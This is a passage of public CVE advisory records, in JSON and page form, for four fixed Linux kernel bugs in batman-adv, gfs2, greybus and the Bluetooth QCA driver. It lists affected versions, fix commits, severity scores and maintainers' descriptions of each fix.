                  "versionStartIncluding": "2.6.39",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbatman-adv: bypass empty buckets in batadv_purge_orig_ref()\n\nMany syzbot reports are pointing to soft lockups in\nbatadv_purge_orig_ref() [1]\n\nRoot cause is unknown, but we can avoid spending too much\ntime there and perhaps get more interesting reports.\n\n[1]\n\nwatchdog: BUG: soft lockup - CPU#0 stuck for 27s! [kworker/u4:6:621]\nModules linked in:\nirq event stamp: 6182794\n hardirqs last  enabled at (6182793): [\u003cffff8000801dae10\u003e] __local_bh_enable_ip+0x224/0x44c kernel/softirq.c:386\n hardirqs last disabled at (6182794): [\u003cffff80008ad66a78\u003e] __el1_irq arch/arm64/kernel/entry-common.c:533 [inline]\n hardirqs last disabled at (6182794): [\u003cffff80008ad66a78\u003e] el1_interrupt+0x24/0x68 arch/arm64/kernel/entry-common.c:551\n softirqs last  enabled at (6182792): [\u003cffff80008aab71c4\u003e] spin_unlock_bh include/linux/spinlock.h:396 [inline]\n softirqs last  enabled at (6182792): [\u003cffff80008aab71c4\u003e] batadv_purge_orig_ref+0x114c/0x1228 net/batman-adv/originator.c:1287\n softirqs last disabled at (6182790): [\u003cffff80008aab61dc\u003e] spin_lock_bh include/linux/spinlock.h:356 [inline]\n softirqs last disabled at (6182790): [\u003cffff80008aab61dc\u003e] batadv_purge_orig_ref+0x164/0x1228 net/batman-adv/originator.c:1271\nCPU: 0 PID: 621 Comm: kworker/u4:6 Not tainted 6.8.0-rc7-syzkaller-g707081b61156 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024\nWorkqueue: bat_events batadv_purge_orig\npstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : should_resched arch/arm64/include/asm/preempt.h:79 [inline]\n pc : __local_bh_enable_ip+0x228/0x44c kernel/softirq.c:388\n lr : __local_bh_enable_ip+0x224/0x44c kernel/softirq.c:386\nsp : ffff800099007970\nx29: ffff800099007980 x28: 1fffe00018fce1bd x27: dfff800000000000\nx26: ffff0000d2620008 x25: ffff0000c7e70de8 x24: 0000000000000001\nx23: 1fffe00018e57781 x22: dfff800000000000 x21: ffff80008aab71c4\nx20: ffff0001b40136c0 x19: ffff0000c72bbc08 x18: 1fffe0001a817bb0\nx17: ffff800125414000 x16: ffff80008032116c x15: 0000000000000001\nx14: 1fffe0001ee9d610 x13: 0000000000000000 x12: 0000000000000003\nx11: 0000000000000000 x10: 0000000000ff0100 x9 : 0000000000000000\nx8 : 00000000005e5789 x7 : ffff80008aab61dc x6 : 0000000000000000\nx5 : 0000000000000000 x4 : 0000000000000001 x3 : 0000000000000000\nx2 : 0000000000000006 x1 : 0000000000000080 x0 : ffff800125414000\nCall trace:\n  __daif_local_irq_enable arch/arm64/include/asm/irqflags.h:27 [inline]\n  arch_local_irq_enable arch/arm64/include/asm/irqflags.h:49 [inline]\n  __local_bh_enable_ip+0x228/0x44c kernel/softirq.c:386\n  __raw_spin_unlock_bh include/linux/spinlock_api_smp.h:167 [inline]\n  _raw_spin_unlock_bh+0x3c/0x4c kernel/locking/spinlock.c:210\n  spin_unlock_bh include/linux/spinlock.h:396 [inline]\n  batadv_purge_orig_ref+0x114c/0x1228 net/batman-adv/originator.c:1287\n  batadv_purge_orig+0x20/0x70 net/batman-adv/originator.c:1300\n  process_one_work+0x694/0x1204 kernel/workqueue.c:2633\n  process_scheduled_works kernel/workqueue.c:2706 [inline]\n  worker_thread+0x938/0xef4 kernel/workqueue.c:2787\n  kthread+0x288/0x310 kernel/kthread.c:388\n  ret_from_fork+0x10/0x20 arch/arm64/kernel/entry.S:860\nSending NMI from CPU 0 to CPUs 1:\nNMI backtrace for cpu 1\nCPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.8.0-rc7-syzkaller-g707081b61156 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024\npstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : arch_local_irq_enable+0x8/0xc arch/arm64/include/asm/irqflags.h:51\n lr : default_idle_call+0xf8/0x128 kernel/sched/idle.c:103\nsp : ffff800093a17d30\nx29: ffff800093a17d30 x28: dfff800000000000 x27: 1ffff00012742fb4\nx26: ffff80008ec9d000 x25: 0000000000000000 x24: 0000000000000002\nx23: 1ffff00011d93a74 x22: ffff80008ec9d3a0 x21: 0000000000000000\nx20: ffff0000c19dbc00 x19: ffff8000802d0fd8 x18: 1fffe00036804396\nx17: ffff80008ec9d000 x16: ffff8000802d089c x15: 0000000000000001\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:10.952Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/79636f636126775436a11ee9cf00a9253a33ac11"
        },
        {
          "url": "https://git.kernel.org/stable/c/154e3f862ba33675cf3f4abf0a0a309a89df87d2"
        },
        {
          "url": "https://git.kernel.org/stable/c/82cdea8f3af1e36543c937df963d108c60bea030"
        },
        {
          "url": "https://git.kernel.org/stable/c/92176caf9896572f00e741a93cecc0ef1172da07"
        },
        {
          "url": "https://git.kernel.org/stable/c/fed7914858a1f1f3e6350bb0f620d6ef15107d16"
        },
        {
          "url": "https://git.kernel.org/stable/c/2685008a5f9a636434a8508419cee8158a2f52c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/ae7f3cffe86aea3da0e8e079525a1ae619b8862a"
        },
        {
          "url": "https://git.kernel.org/stable/c/40dc8ab605894acae1473e434944924a22cfaaa0"
        }
      ],
      "title": "batman-adv: bypass empty buckets in batadv_purge_orig_ref()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40981",
    "datePublished": "2024-07-12T12:32:16.277Z",
    "dateReserved": "2024-07-12T12:17:45.604Z",
    "dateUpdated": "2026-01-05T10:37:10.952Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-52760 (GCVE-0-2023-52760)

Vulnerability from cvelistv5 – Published: 2024-05-21 15:30 – Updated: 2025-11-03 21:50

Title

gfs2: Fix slab-use-after-free in gfs2_qd_dealloc

Summary

In the Linux kernel, the following vulnerability has been resolved: gfs2: Fix slab-use-after-free in gfs2_qd_dealloc In gfs2_put_super(), whether withdrawn or not, the quota should be cleaned up by gfs2_quota_cleanup(). Otherwise, struct gfs2_sbd will be freed before gfs2_qd_dealloc (rcu callback) has run for all gfs2_quota_data objects, resulting in use-after-free. Also, gfs2_destroy_threads() and gfs2_quota_cleanup() is already called by gfs2_make_fs_ro(), so in gfs2_put_super(), after calling gfs2_make_fs_ro(), there is no need to call them again.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/08a28272faa750d43…
	https://git.kernel.org/stable/c/bdcb8aa434c6d36b5…

Impacted products

Vendor

Product

Version

Linux

Affected: f66af88e33212b57ea86da2c5d66c0d9d5c46344 , < 08a28272faa750d4357ea2cb48d2baefd778ea81 (git)
Affected: f66af88e33212b57ea86da2c5d66c0d9d5c46344 , < bdcb8aa434c6d36b5c215d02a9ef07551be25a37 (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.3 , ≤ 6.6.* (semver)
Unaffected: 6.7 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52760",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-22T18:26:22.936431Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:24:04.103Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:50:24.860Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7ad4e0a4f61c57c3ca291ee010a9d677d0199fba"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/08a28272faa750d4357ea2cb48d2baefd778ea81"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bdcb8aa434c6d36b5c215d02a9ef07551be25a37"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/gfs2/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "08a28272faa750d4357ea2cb48d2baefd778ea81",
              "status": "affected",
              "version": "f66af88e33212b57ea86da2c5d66c0d9d5c46344",
              "versionType": "git"
            },
            {
              "lessThan": "bdcb8aa434c6d36b5c215d02a9ef07551be25a37",
              "status": "affected",
              "version": "f66af88e33212b57ea86da2c5d66c0d9d5c46344",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/gfs2/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.7",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.3",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix slab-use-after-free in gfs2_qd_dealloc\n\nIn gfs2_put_super(), whether withdrawn or not, the quota should\nbe cleaned up by gfs2_quota_cleanup().\n\nOtherwise, struct gfs2_sbd will be freed before gfs2_qd_dealloc (rcu\ncallback) has run for all gfs2_quota_data objects, resulting in\nuse-after-free.\n\nAlso, gfs2_destroy_threads() and gfs2_quota_cleanup() is already called\nby gfs2_make_fs_ro(), so in gfs2_put_super(), after calling\ngfs2_make_fs_ro(), there is no need to call them again."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-06-19T12:56:30.906Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/08a28272faa750d4357ea2cb48d2baefd778ea81"
        },
        {
          "url": "https://git.kernel.org/stable/c/bdcb8aa434c6d36b5c215d02a9ef07551be25a37"
        }
      ],
      "title": "gfs2: Fix slab-use-after-free in gfs2_qd_dealloc",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52760",
    "datePublished": "2024-05-21T15:30:46.427Z",
    "dateReserved": "2024-05-21T15:19:24.237Z",
    "dateUpdated": "2025-11-03T21:50:24.860Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39495 (GCVE-0-2024-39495)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:20 – Updated: 2026-01-05 10:36

Title

greybus: Fix use-after-free bug in gb_interface_release due to race condition.

Summary

In the Linux kernel, the following vulnerability has been resolved: greybus: Fix use-after-free bug in gb_interface_release due to race condition. In gb_interface_create, &intf->mode_switch_completion is bound with gb_interface_mode_switch_work. Then it will be started by gb_interface_request_mode_switch. Here is the relevant code. if (!queue_work(system_long_wq, &intf->mode_switch_work)) { ... } If we call gb_interface_release to make cleanup, there may be an unfinished work. This function will call kfree to free the object "intf". However, if gb_interface_mode_switch_work is scheduled to run after kfree, it may cause use-after-free error as gb_interface_mode_switch_work will use the object "intf". The possible execution flow that may lead to the issue is as follows: CPU0 CPU1 | gb_interface_create | gb_interface_request_mode_switch gb_interface_release | kfree(intf) (free) | | gb_interface_mode_switch_work | mutex_lock(&intf->mutex) (use) Fix it by canceling the work before kfree.

Severity ?

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/74cd0a421896b2e07…
	https://git.kernel.org/stable/c/2b6bb0b4abfd79b86…
	https://git.kernel.org/stable/c/fb071f5c75d4b1c17…
	https://git.kernel.org/stable/c/9a733d69a4a59c2d0…
	https://git.kernel.org/stable/c/0b8fba38bdfb848fa…
	https://git.kernel.org/stable/c/03ea2b12934415215…
	https://git.kernel.org/stable/c/5c9c5d7f26acc2c66…

Impacted products

Vendor

Product

Version

Linux

Affected: 55742d2a071a569bf20f90d37b1b5b8a25a3f882 , < 74cd0a421896b2e07eafe7da4275302bfecef201 (git)
Affected: 55742d2a071a569bf20f90d37b1b5b8a25a3f882 , < 2b6bb0b4abfd79b8698ee161bb73c0936a2aaf83 (git)
Affected: 55742d2a071a569bf20f90d37b1b5b8a25a3f882 , < fb071f5c75d4b1c177824de74ee75f9dd34123b9 (git)
Affected: 55742d2a071a569bf20f90d37b1b5b8a25a3f882 , < 9a733d69a4a59c2d08620e6589d823c24be773dc (git)
Affected: 55742d2a071a569bf20f90d37b1b5b8a25a3f882 , < 0b8fba38bdfb848fac52e71270b2aa3538c996ea (git)
Affected: 55742d2a071a569bf20f90d37b1b5b8a25a3f882 , < 03ea2b129344152157418929f06726989efc0445 (git)
Affected: 55742d2a071a569bf20f90d37b1b5b8a25a3f882 , < 5c9c5d7f26acc2c669c1dcf57d1bb43ee99220ce (git)

Linux

Affected: 4.9
Unaffected: 0 , < 4.9 (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:56:12.660Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/74cd0a421896b2e07eafe7da4275302bfecef201"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2b6bb0b4abfd79b8698ee161bb73c0936a2aaf83"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fb071f5c75d4b1c177824de74ee75f9dd34123b9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9a733d69a4a59c2d08620e6589d823c24be773dc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0b8fba38bdfb848fac52e71270b2aa3538c996ea"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/03ea2b129344152157418929f06726989efc0445"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5c9c5d7f26acc2c669c1dcf57d1bb43ee99220ce"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unaffected",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "74cd0a421896",
                "status": "affected",
                "version": "0",
                "versionType": "git"
              },
              {
                "lessThan": "2b6bb0b4abfd",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "fb071f5c75d4",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "9a733d69a4a5",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "0b8fba38bdfb",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "03ea2b129344",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "5c9c5d7f26ac",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-39495",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-16T04:02:11.550513Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-416",
                "description": "CWE-416 Use After Free",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-20T14:16:51.245Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/greybus/interface.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "74cd0a421896b2e07eafe7da4275302bfecef201",
              "status": "affected",
              "version": "55742d2a071a569bf20f90d37b1b5b8a25a3f882",
              "versionType": "git"
            },
            {
              "lessThan": "2b6bb0b4abfd79b8698ee161bb73c0936a2aaf83",
              "status": "affected",
              "version": "55742d2a071a569bf20f90d37b1b5b8a25a3f882",
              "versionType": "git"
            },
            {
              "lessThan": "fb071f5c75d4b1c177824de74ee75f9dd34123b9",
              "status": "affected",
              "version": "55742d2a071a569bf20f90d37b1b5b8a25a3f882",
              "versionType": "git"
            },
            {
              "lessThan": "9a733d69a4a59c2d08620e6589d823c24be773dc",
              "status": "affected",
              "version": "55742d2a071a569bf20f90d37b1b5b8a25a3f882",
              "versionType": "git"
            },
            {
              "lessThan": "0b8fba38bdfb848fac52e71270b2aa3538c996ea",
              "status": "affected",
              "version": "55742d2a071a569bf20f90d37b1b5b8a25a3f882",
              "versionType": "git"
            },
            {
              "lessThan": "03ea2b129344152157418929f06726989efc0445",
              "status": "affected",
              "version": "55742d2a071a569bf20f90d37b1b5b8a25a3f882",
              "versionType": "git"
            },
            {
              "lessThan": "5c9c5d7f26acc2c669c1dcf57d1bb43ee99220ce",
              "status": "affected",
              "version": "55742d2a071a569bf20f90d37b1b5b8a25a3f882",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/greybus/interface.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.9"
            },
            {
              "lessThan": "4.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngreybus: Fix use-after-free bug in gb_interface_release due to race condition.\n\nIn gb_interface_create, \u0026intf-\u003emode_switch_completion is bound with\ngb_interface_mode_switch_work. Then it will be started by\ngb_interface_request_mode_switch. Here is the relevant code.\nif (!queue_work(system_long_wq, \u0026intf-\u003emode_switch_work)) {\n\t...\n}\n\nIf we call gb_interface_release to make cleanup, there may be an\nunfinished work. This function will call kfree to free the object\n\"intf\". However, if gb_interface_mode_switch_work is scheduled to\nrun after kfree, it may cause use-after-free error as\ngb_interface_mode_switch_work will use the object \"intf\".\nThe possible execution flow that may lead to the issue is as follows:\n\nCPU0                            CPU1\n\n                            |   gb_interface_create\n                            |   gb_interface_request_mode_switch\ngb_interface_release        |\nkfree(intf) (free)          |\n                            |   gb_interface_mode_switch_work\n                            |   mutex_lock(\u0026intf-\u003emutex) (use)\n\nFix it by canceling the work before kfree."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:47.683Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/74cd0a421896b2e07eafe7da4275302bfecef201"
        },
        {
          "url": "https://git.kernel.org/stable/c/2b6bb0b4abfd79b8698ee161bb73c0936a2aaf83"
        },
        {
          "url": "https://git.kernel.org/stable/c/fb071f5c75d4b1c177824de74ee75f9dd34123b9"
        },
        {
          "url": "https://git.kernel.org/stable/c/9a733d69a4a59c2d08620e6589d823c24be773dc"
        },
        {
          "url": "https://git.kernel.org/stable/c/0b8fba38bdfb848fac52e71270b2aa3538c996ea"
        },
        {
          "url": "https://git.kernel.org/stable/c/03ea2b129344152157418929f06726989efc0445"
        },
        {
          "url": "https://git.kernel.org/stable/c/5c9c5d7f26acc2c669c1dcf57d1bb43ee99220ce"
        }
      ],
      "title": "greybus: Fix use-after-free bug in gb_interface_release due to race condition.",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39495",
    "datePublished": "2024-07-12T12:20:31.022Z",
    "dateReserved": "2024-06-25T14:23:23.751Z",
    "dateUpdated": "2026-01-05T10:36:47.683Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42137 (GCVE-0-2024-42137)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:02

Title

Bluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot

Summary

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot Commit 272970be3dab ("Bluetooth: hci_qca: Fix driver shutdown on closed serdev") will cause below regression issue: BT can't be enabled after below steps: cold boot -> enable BT -> disable BT -> warm reboot -> BT enable failure if property enable-gpios is not configured within DT|ACPI for QCA6390. The commit is to fix a use-after-free issue within qca_serdev_shutdown() by adding condition to avoid the serdev is flushed or wrote after closed but also introduces this regression issue regarding above steps since the VSC is not sent to reset controller during warm reboot. Fixed by sending the VSC to reset controller within qca_serdev_shutdown() once BT was ever enabled, and the use-after-free issue is also fixed by this change since the serdev is still opened before it is flushed or wrote. Verified by the reported machine Dell XPS 13 9310 laptop over below two kernel commits: commit e00fc2700a3f ("Bluetooth: btusb: Fix triggering coredump implementation for QCA") of bluetooth-next tree. commit b23d98d46d28 ("Bluetooth: btusb: Fix triggering coredump implementation for QCA") of linus mainline tree.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/215a26c2404fa3462…
	https://git.kernel.org/stable/c/4ca6013cd18e58ac1…
	https://git.kernel.org/stable/c/e6e200b264271f62a…
	https://git.kernel.org/stable/c/e2d8aa4c763593704…
	https://git.kernel.org/stable/c/977b9dc65e14fb80d…
	https://git.kernel.org/stable/c/88e72239ead9814b8…

Impacted products

Vendor

Product

Version

Linux

Affected: e84ec6e25df9bb0968599e92eacedaf3a0a5b587 , < 215a26c2404fa34625c725d446967fa328a703eb (git)
Affected: 908d1742b6e694e84ead5c62e4b7c1bfbb8b46a3 , < 4ca6013cd18e58ac1044908c40d4006a92093a11 (git)
Affected: ea3ebda47dd56f6e1c62f2e0e1b6e1b0a973e447 , < e6e200b264271f62a3fadb51ada9423015ece37b (git)
Affected: 272970be3dabd24cbe50e393ffee8f04aec3b9a8 , < e2d8aa4c763593704ac21e7591aed4f13e32f3b5 (git)
Affected: 272970be3dabd24cbe50e393ffee8f04aec3b9a8 , < 977b9dc65e14fb80de4763d949c7dec2ecb15b9b (git)
Affected: 272970be3dabd24cbe50e393ffee8f04aec3b9a8 , < 88e72239ead9814b886db54fc4ee39ef3c2b8f26 (git)

Linux

Affected: 6.2
Unaffected: 0 , < 6.2 (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:05.374Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/215a26c2404fa34625c725d446967fa328a703eb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4ca6013cd18e58ac1044908c40d4006a92093a11"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e6e200b264271f62a3fadb51ada9423015ece37b"
          },
